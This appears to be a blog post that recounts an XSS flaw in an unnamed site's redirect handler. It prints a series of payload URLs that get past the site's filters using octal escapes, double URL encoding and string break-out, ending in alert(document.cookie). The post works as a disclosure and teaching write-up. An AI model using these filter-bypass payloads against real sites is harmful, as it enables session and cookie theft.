I've decided to write a little bit about an XSS vulnerability I came across on a website that will remain anonymous for the time being, as they haven't gotten around to fixing it yet. As the title might imply, the XSS was found in a document.location redirect. It started off as simple as:
http://side.tld/linkhandler.jsp?r=javascript:alert(0) - Nothing special about this.
What action did their admin take?
Filter out the word 'javascript'...
Seems they forgot to filter the backslash, so I replaced the ASCII character 'a' with its octal equivalent.
http://side.tld/linkhandler.jsp?r=j\141vascript:alert(0)
What action did their admin take?
Escape the backslash with another backslash.
How about double URL encoding? Hrm, seems they missed that as well.
http://side.tld/linkhandler.jsp?r=j%2541vascript:alert(0)
What action did their admin take?
Escape %41 ...
Earlier in the day, I tested this, which worked fine:
http://side.tld/linkhandler.jsp?r=http://%2527%253B%0Aalert(document.cookie)%253B%2527
Later that same day, I tried again, but it now required a valid URL; simply leaving it empty would yield an infinite loop.
http://side.tld/linkhandler.jsp?r=http://site.tld%2527%253B%0Aalert(document.cookie)%253B%2527
Which results in:
document.location = 'http://site.tld';
alert(document.cookie);'';
To this day, the vulnerability hasn't been fixed; I'm guessing they just gave up. Sometimes it is worth spending a little extra money to get the job done right, even if that means hiring a security specialist.
R.S.